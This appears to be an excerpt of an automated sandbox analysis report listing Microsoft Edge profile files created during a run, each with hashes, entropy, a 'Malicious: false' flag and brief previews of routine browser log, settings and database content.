SSDEEP:	6:HGJ9uDjOBGFN+q2PN723oH+Tcwt8NIFUt8YGJ9uDjOBGFZZmw+YGJ9uDjOBGFNVw:BuGFN+vVaYebpFUt88uGFZ/+8uGFNV5C
MD5:	D5D069B3126C1FB8AB26DDC9CE76CC5E
SHA1:	04943892A4B54B7AE58D05D4E6123DBEA19C9027
SHA-256:	90F79666456412A0B64E2E2B0ED0D996F5D09E4DABCE7EB69C9300C0CAA71510
SHA-512:	A1EE0032BEE65DDA8C40CE15A6647184E7F73DD6CBA34FC89225653312EF68FB65C091880A2E3419FF03AA5A04A0A46CB29E6801021B8601CF70E20EA71FC3CF
Malicious:	false
Preview:	2024/11/23-01:09:32.997 1ddc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/11/23-01:09:32.997 1ddc Recovering log #3.2024/11/23-01:09:32.997 1ddc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.1282187188038275
Encrypted:	false
SSDEEP:	6:HGJ9uDjOBGFN+q2PN723oH+Tcwt8NIFUt8YGJ9uDjOBGFZZmw+YGJ9uDjOBGFNVw:BuGFN+vVaYebpFUt88uGFZ/+8uGFNV5C
MD5:	D5D069B3126C1FB8AB26DDC9CE76CC5E
SHA1:	04943892A4B54B7AE58D05D4E6123DBEA19C9027
SHA-256:	90F79666456412A0B64E2E2B0ED0D996F5D09E4DABCE7EB69C9300C0CAA71510
SHA-512:	A1EE0032BEE65DDA8C40CE15A6647184E7F73DD6CBA34FC89225653312EF68FB65C091880A2E3419FF03AA5A04A0A46CB29E6801021B8601CF70E20EA71FC3CF
Malicious:	false
Preview:	2024/11/23-01:09:32.997 1ddc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/11/23-01:09:32.997 1ddc Recovering log #3.2024/11/23-01:09:32.997 1ddc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	429
Entropy (8bit):	5.809210454117189
Encrypted:	false
SSDEEP:	6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
MD5:	5D1D9020CCEFD76CA661902E0C229087
SHA1:	DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
SHA-256:	B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
SHA-512:	5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
Malicious:	false
Preview:	{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	0.2191763562065486
Encrypted:	false
SSDEEP:	3:GvxvtFlljq7A/mhWJFuQ3yy7IOWU/A4dweytllrE9SFcTp4AGbNCV9RUI94i:Gvxk75fOy4d0Xi99pEYD4i
MD5:	44E231FC880B85D255B1143EBC88A7B6
SHA1:	85AAF62C688715CD827CA97054865F2245DBA6FD
SHA-256:	48A9DEA28B4755D395F50B9E6E956F8756440BCAC115D89E450D595BF996A94D
SHA-512:	1A04DC6509C5FAB0602AFF33835A370798C4B59E09DE63EA4F9A07341A95704498C99B001D50EB9A37F82CC0BEA9280E0ABE48BF59A8CA66BEF74E6A8E008CE0
Malicious:	false
Preview:	............Az.....&....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (1597), with CRLF line terminators
Category:	dropped
Size (bytes):	115717
Entropy (8bit):	5.183660917461099
Encrypted:	false
SSDEEP:	1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
MD5:	3D8183370B5E2A9D11D43EBEF474B305
SHA1:	155AB0A46E019E834FA556F3D818399BFF02162B
SHA-256:	6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
SHA-512:	B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
Malicious:	false
Preview:	{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs\|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs\|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 11, cookie 0x3, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	45056
Entropy (8bit):	3.918430532977499
Encrypted:	false
SSDEEP:	384:jj9P0lQkQerkjly773pLDcIgam6IkP/KbtXh3RKToaAu:jdee2mly7O/UP/IhRKcC
MD5:	0B5A20684D658E835E5422D9604C95E6
SHA1:	7B6090FA08D614CDA62203A31D9A75A1505F4983
SHA-256:	C95CF452EEC4A9C2BB6300B5CB1EF41CD1C007DF7BC090514ED7294B4CD99C8F
SHA-512:	185586AAAD9C6D9447C5AF1AC420CE291DF540EB0CA5DABCFAFF3A001D8D91C6232E169F6C73C4CB166157AF9A922D33D3CF062CAD351129A51D0464AC811D7B
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	412
Entropy (8bit):	5.228316528483801
Encrypted:	false
SSDEEP:	12:iIvVaYeb8rcHEZrELFUt8I/+t5OaYeb8rcHEZrEZSJ:i6VaYeb8nZrExg8dOaYeb8nZrEZe
MD5:	4D393DCB2C41A672B5BF72491D4CC41D
SHA1:	2900E958D49F47761AE153BECE2122FB2E8C625C
SHA-256:	7AED9F248FC6FC8B1A6B466E1BE56390CBD276837881B65BCF435EEEF42F9256
SHA-512:	737B009FADF77DD4319818610783B251B5D07D2B980D828BE2EC37649EE889E8FE7455387C2689D6F5BB5BA7D611DEAA3B49BF08F7E271F638BE38682AD32A2C
Malicious:	false
Preview:	2024/11/23-01:09:34.953 1ce0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/11/23-01:09:34.954 1ce0 Recovering log #3.2024/11/23-01:09:34.955 1ce0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	412
Entropy (8bit):	5.228316528483801
Encrypted:	false
SSDEEP:	12:iIvVaYeb8rcHEZrELFUt8I/+t5OaYeb8rcHEZrEZSJ:i6VaYeb8nZrExg8dOaYeb8nZrEZe
MD5:	4D393DCB2C41A672B5BF72491D4CC41D
SHA1:	2900E958D49F47761AE153BECE2122FB2E8C625C
SHA-256:	7AED9F248FC6FC8B1A6B466E1BE56390CBD276837881B65BCF435EEEF42F9256
SHA-512:	737B009FADF77DD4319818610783B251B5D07D2B980D828BE2EC37649EE889E8FE7455387C2689D6F5BB5BA7D611DEAA3B49BF08F7E271F638BE38682AD32A2C
Malicious:	false
Preview:	2024/11/23-01:09:34.953 1ce0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/11/23-01:09:34.954 1ce0 Recovering log #3.2024/11/23-01:09:34.955 1ce0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1475
Entropy (8bit):	5.67422614320023
Encrypted:	false
SSDEEP:	24:xZWSUlHI0l9XvXC0lJDjDrXZ1BW2sFV03y1x4bMyoWsIkTN5zgFHHmi28/V:xZnE9Xv7XHXZm2iV03Sx4gyojt+HH32M
MD5:	02C1163FCA59354157CD2C621123F1AE
SHA1:	A7AD6873ED7051B411834FE6CBD1CC01B8E10BE2
SHA-256:	0D51FD509DB8A9F098C9C4B109FD878D11F9E66CC6BC7D28C144ED1356D64458
SHA-512:	74AC10576E9DFA3D54B7D000A2649914D7F152FA7105A3D6B63237C0E75B8B08EB578E441069744559B6B0DAC181B216B88D82B56B28EAE2398F7388B8839D73
Malicious:	false
Preview:	<6X.\|................VERSION.1..META:https://ntp.msn.com.............._https://ntp.msn.com..FallbackNavigationResult?.{"r":"edgenext-base-v1-empty. NetworkCall","ic":true,"te":788}.!_https://ntp.msn.com..LastKnownPV..1732342189091.-_https://ntp.msn.com..LastVisuallyReadyMarker..1732342190033.._https://ntp.msn.com..MUID!.076D87ACE96D60880BB292ECE84461D8.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1732342189167,"schedule":[34,-1,35,-1,-1,24,-1],"scheduleFixed":[34,-1,35,-1,-1,24,-1],"simpleSchedule":[46,20,37,23,19,47,51]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1732342189027.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241122.365"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_htt

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	340
Entropy (8bit):	5.1714430001254765
Encrypted:	false
SSDEEP:	6:HGJ9uPB39+q2PN723oH+Tcwt8a2jMGIFUt8YGJ9uP4qEJZmw+YGJ9uPbFn39VkwU:LN+vVaYeb8EFUt8RZ/+cNV5OaYeb8bJ
MD5:	0A6BED48F9254266561720ABCF4337D5
SHA1:	A8BC9AF106643EBC319C9D837204DF6B5345401D
SHA-256:	B51B4233902A8B293597B7536AF3A54CDAD07A05B611F0079AA49BEAA22B2C10
SHA-512:	B0DA70749AF2B9136EF746F0C3ED2976E3173C2C4710B90AC99247F8D45FA732A942B26D8AFFC76BB7208ACEDE744D4D9E40D6E8658D5BFEDF3981A50E8974FE
Malicious:	false
Preview:	2024/11/23-01:09:32.557 1dbc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/23-01:09:32.558 1dbc Recovering log #3.2024/11/23-01:09:32.562 1dbc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	340
Entropy (8bit):	5.1714430001254765
Encrypted:	false
SSDEEP:	6:HGJ9uPB39+q2PN723oH+Tcwt8a2jMGIFUt8YGJ9uP4qEJZmw+YGJ9uPbFn39VkwU:LN+vVaYeb8EFUt8RZ/+cNV5OaYeb8bJ
MD5:	0A6BED48F9254266561720ABCF4337D5
SHA1:	A8BC9AF106643EBC319C9D837204DF6B5345401D
SHA-256:	B51B4233902A8B293597B7536AF3A54CDAD07A05B611F0079AA49BEAA22B2C10
SHA-512:	B0DA70749AF2B9136EF746F0C3ED2976E3173C2C4710B90AC99247F8D45FA732A942B26D8AFFC76BB7208ACEDE744D4D9E40D6E8658D5BFEDF3981A50E8974FE
Malicious:	false
Preview:	2024/11/23-01:09:32.557 1dbc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/23-01:09:32.558 1dbc Recovering log #3.2024/11/23-01:09:32.562 1dbc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\4539299a-e013-4690-82b4-f3d26c4e9849.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\6d7ae834-c21f-4ce8-9215-08fbc7cf76c7.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\74628cf2-426f-44c9-9415-16f2cf6683fe.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	1747
Entropy (8bit):	5.308582375769547
Encrypted:	false
SSDEEP:	48:YcCpfgCzssts3fc7RseleeIkEsaCgHHYhbj:F2fjI2hkeIkuT4h/
MD5:	2D1AFDFE1A6ECE3D7D47E4B210F30C94
SHA1:	0387FDE30D5470D9BBE723054FCDAA69807FA5C6
SHA-256:	2434F016090EAC5FC419FCC4B0D62524A516FCD42E675881B481BFF49250D77F
SHA-512:	185A84D84026BD26C296CA1E7FFA7F208EC4D7CE83E4817D0571CB5CB43BE6F4A21654D566A0DEFE1345B078E77A0991BEAB9D735468CAE442F1740B01E35670
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379407776146166","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379407779930303","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL2F6dXJlZWRnZS5uZXQAAAA=",false],"server":"https://edgeassetservice.azureedge.net","supports_spdy":true},{"alternative_service":[{"advertised_a

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	2.7720906324672394
Encrypted:	false
SSDEEP:	96:te+AuRpanjBBE4Q+Du95xo2SMZSqZD2bvVaqyjYbwXckO0L/ZJV8Y:tTRCHc+6Zo27QqZCFyjY8Xcf0L/ZJVb
MD5:	047E2333E57537ABBC8777632F75040D
SHA1:	F069304681C7AFE3B8889E956712268AEACA9DDF
SHA-256:	9D8393053C8FA17B3CE53C9CAE7243FBB0719E449BE8D4DA1FD5846891FA70C2
SHA-512:	71EF42313C92B8F73D248FEA91352F7E7D2C6378A4FA44C9B277D65D62D176E100794DFCF6C23F3DB8DAE1459E88BEC3FF07066778F4132C1B981D35BA95BAD0
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1747
Entropy (8bit):	5.308582375769547
Encrypted:	false
SSDEEP:	48:YcCpfgCzssts3fc7RseleeIkEsaCgHHYhbj:F2fjI2hkeIkuT4h/
MD5:	2D1AFDFE1A6ECE3D7D47E4B210F30C94
SHA1:	0387FDE30D5470D9BBE723054FCDAA69807FA5C6
SHA-256:	2434F016090EAC5FC419FCC4B0D62524A516FCD42E675881B481BFF49250D77F
SHA-512:	185A84D84026BD26C296CA1E7FFA7F208EC4D7CE83E4817D0571CB5CB43BE6F4A21654D566A0DEFE1345B078E77A0991BEAB9D735468CAE442F1740B01E35670
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379407776146166","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379407779930303","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL2F6dXJlZWRnZS5uZXQAAAA=",false],"server":"https://edgeassetservice.azureedge.net","supports_spdy":true},{"alternative_service":[{"advertised_a

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	1.377881527918679
Encrypted:	false
SSDEEP:	96:JkIEumQv8m1ccnvS6kWuZ+lGFh5uvaw1a:+IEumQv8m1ccnvS6kSKuSr
MD5:	A4BA8A9EB2CC63464DA11E2D1A944B8D
SHA1:	10118A1364C49FE1880AE1B6E480FD60C12F647E
SHA-256:	FF3DF6245206F1E0DAD5F17C634B3E81B280977C39C87E40F31DEBAA127D65BA
SHA-512:	BADEBAF0DD31E06A6B0C375A9C17260A34823EFFC345BAA403BCE502FDFA38C0EC5663A36147C2FE04DDC4A736A79A35219A120264764CAE37BB153AF8C33859
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF3adb6.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF3c2c4.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\ab1a9729-29fd-4839-8fea-47c904e045c4.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\dd770729-a35d-4d2b-8e02-61865874e70d.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8350301952073809
Encrypted:	false
SSDEEP:	24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
MD5:	0DAD8D7F079797377CD56DAE47E1A619
SHA1:	A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
SHA-256:	7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
SHA-512:	5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9861
Entropy (8bit):	5.1100377054653405
Encrypted:	false
SSDEEP:	192:stwkdpBsPuBaFvrE9kDKqc8JbV+FEpQAnUvOiPgYJ:stwQBsPuBCDBbGmQ5P
MD5:	7443935C83C78EB352AE178E583570C9
SHA1:	B69DB373B955B356017836F9BDAAC3794439F1F8
SHA-256:	DD7D45DA05FFE9067173261615E6C4159C19FF25BC6784C9C91A4212282E5700
SHA-512:	906245D333B5C77CA207EC8DC6F801AFB08CB510577C181745DEE5B8D15E819002502761E5C2C826FBC50A85A3CE30331F49DB2ABEE547E7F38A4B305784512A
Malicious:	false
